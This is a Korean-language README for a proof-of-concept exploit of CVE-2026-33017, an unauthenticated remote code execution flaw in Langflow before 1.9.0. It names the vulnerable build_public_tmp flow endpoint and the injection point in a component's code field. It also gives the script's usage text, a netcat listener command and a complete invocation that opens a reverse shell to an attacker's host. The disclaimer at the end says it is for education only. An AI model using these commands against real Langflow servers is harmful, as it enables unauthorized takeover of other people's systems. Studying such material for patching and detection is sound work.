
CVE-2026-33017 익스플로잇 | by infrar3d
xpl0ited by infrar3d
이 개념 증명 익스플로잇은 1.9.0 이전 버전의 Langflow에서 발견된 중요한 원격 코드 실행(RCE) 취약점을 대상으로 합니다. 이 취약점은 인증되지 않은 공격자가 플로우 빌딩 API 엔드포인트를 통해 악성 Python 코드를 주입하여 임의의 시스템 명령을 실행할 수 있게 합니다. 취약점은 /api/v1/build_public_tmp/{flow_id}/flow 엔드포인트에 존재하며, 이 엔드포인트는 컴포넌트 템플릿의 코드 필드에서 사용자가 제공한 코드를 부적절하게 검사합니다.
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
The first terminal (listener):
nc -lvnp 4444
The second terminal (exploit):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
이 소프트웨어와 개념 증명 코드는 교육 및 연구 목적으로만 제공됩니다.
모든 관련 법률을 준수할 책임은 귀하에게 있습니다. 윤리적이고 책임감 있게 사용하십시오.